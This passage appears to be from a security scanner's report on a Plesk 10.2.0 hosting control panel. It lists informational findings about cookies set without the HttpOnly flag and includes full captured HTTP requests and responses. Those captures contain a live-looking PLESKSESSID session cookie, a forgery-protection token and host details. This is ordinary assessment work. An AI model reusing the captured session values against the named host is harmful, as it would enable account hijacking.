stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fhotlink-protection%252F%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fhotlink-protection%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span><a name="status" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Hotlink protection is switched off for this domain.&quot;&#125;]);" onMouseOut="tooltip.hide();"><img src="/skins/default/plesk/icons/off.gif" width="16" height="16"></a>&nbsp;Hotlink Protection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.hosting.hotlink-protection/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function add_oC(f)
           {
               o = f.friend_domain_list;
               v = f.friend_domain;
               if ("" == v.value) {
                   alert("Please type a domain name to be added.");
                   return true;
               }
               for (i = 0; i < o.options.length; i++) {
                   if (o.options[i].value.toLowerCase() == v.value.toLowerCase()) {
                       v.value = "";
                       return true;
                   }
               }
               o.options.add(new Option(v.value, v.value));
               v.value = "";
               save_changes_oC(f);
               return true;
           }
           function remove_oC(f)
           {
               o = f.friend_domain_list;
               if (-1 == o.selectedIndex) {
                   alert("Select domains to be removed.");
                   return true;
               }
               for (i = 0; i < o.options.length; ) {
                   if (o.options[i].selected)
                       o.options[i] = null;
                   else
                       i++;
               }
               save_changes_oC(f);
               return true;
           }
           function save_changes_oC(f)
           {
               o = f.friend_domain_list;
               v = f.friend_domains;
               var added = new Array();
               for (i = 0; i < o.options.length; i++)
                   added.push(o.options[i].value);
               v.value = added.join(",");
           }
           function turn_on_off_oC(command)
           {
               f = document.forms[0];
               f.cmd.value = command;
               lsubmit(f);
               return false;
           }
           function update_oC(command)
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/hotlink-protection/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <div class="toolsArea">
<fieldset>
<legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr><td>
   <div class="screenButtons">
   <DIV class="commonButton" id="bid-enable" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enable hotlink protection of the website content.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return turn_on_off_oC(&#039;turn_on&#039;);;return false;" style=""><BUTTON name="bname_enable" id="buttonid-enable" type="button" onClick="Event.stop(event);return turn_on_off_oC(&#039;turn_on&#039;);;return false;">Switch On</BUTTON><SPAN id="spanid-enable">Switch On</SPAN></DIV>
   </div>
</td></tr>
</table>
</fieldset>
</div>

<div class="formArea">
<fieldset>
<legend>Settings</legend><table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name">
       <label for="fid-extensions">Protected files extensions</label>
   </td>
   <td style="width: 200px;">
       <textarea name="extensions" id="fid-extensions" rows="5" style="width: 200px">bmp dib rle emf wmf gif jpg jpeg jpe jif jfif pcx png tga tiff tif</textarea>
   </td>
   <td></td>
</tr>
<tr><td><br></td><td><br></td><td><br></td></tr>
<tr >
   <td class="name">
       <label for="fid-extensions">Addresses of friendly websites</label>
   </td>
   <td style="width: 200px;">
       <input type="text" name="friend_domain" id="fid-friend_domain" value="" style="width: 200px">
   </td>
   <td>
       <DIV class="commonButton" id="bid-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a website address to the list of friendly websites. &quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);add_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_add" id="buttonid-add" type="button" onClick="Event.stop(event);add_oC(document.forms[0]);return false;">Add</BUTTON><SPAN id="spanid-add">Add</SPAN></DIV>
   </td>
</tr>
<tr >
   <td class="name">
       <label for="fid-friend_domain_list"></label>
   </td>
   <td style="width: 200px;">
       <select multiple name="friend_domain_list" id="fid-friend_domain_list" size="10" style="width: 204px">
           
       </select>
       <input type="hidden" name="friend_domains" value=>
   </td>
   <td>
       <DIV class="commonButton" id="bid-remove" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Remove selected website addresses from the list of friendly websites.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_remove" id="buttonid-remove" type="button" onClick="Event.stop(event);remove_oC(document.forms[0]);return false;">Remove</BUTTON><SPAN id="spanid-remove">Remove</SPAN></DIV>
   </td>
</tr>

</table>
</fieldset>
</div>


   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.30. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/performance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/performance/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/performance/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:40 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:40 GMT
Connection: close
Content-Length: 12378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fperformance%252F%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fbandwidth-limit%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Limit Bandwidth Usage and Number of Allowed Connections to Your Website</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/dom_performance_readonly/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function update_oC(f)
       {
           if (!check_oC(f)) {
               alert("Improper value.");
               return false;
           }

           f.cmd.value="update";
           lsubmit(f);

           return false;
       }

       function check_oC(f)
       {
           if (f.bandwidth_enabled.checked && !chk_pos_int(f.bandwidth.value)) {
               f.bandwidth.select();
               f.bandwidth.focus();
               return false;
           }
           if (f.max_connections_enabled.checked && !chk_pos_int(f.max_connections.value)) {
               f.max_connections.select();
               f.max_connections.focus();
               return false;
           }
           return true;
       }

       function change_oC(o1, o2)
       {
           o2.disabled = !o1.checked;
           if (!o2.disabled) {
               o2.select();
               o2.focus();
           }
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/performance/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   

<fieldset>
   <legend>Bandwidth limiting</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">

       <tr >
           <td class="name"><label for="fid-bandwidth">Maximum bandwidth usage (KB/s)</label></td>
           <td>Unlimited</td>
       </tr>

</table>

</td></tr></table></fieldset>

<fieldset>
   <legend>Connections limiting</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">

       <tr>
           <td class="name"><label for="fid-max_connections">Connections limited to</label></td>
           <td>Unlimited</td>
       </tr>
   </table>

</td></tr></table></fieldset>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.31. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/odbc/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:21 GMT
Connection: close
Content-Length: 15313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fdomain-alias%2540%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fdomain-aliases%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>ODBC DSN</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_dsn_configuration/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/" method="post" enctype="multipart/form-data" >
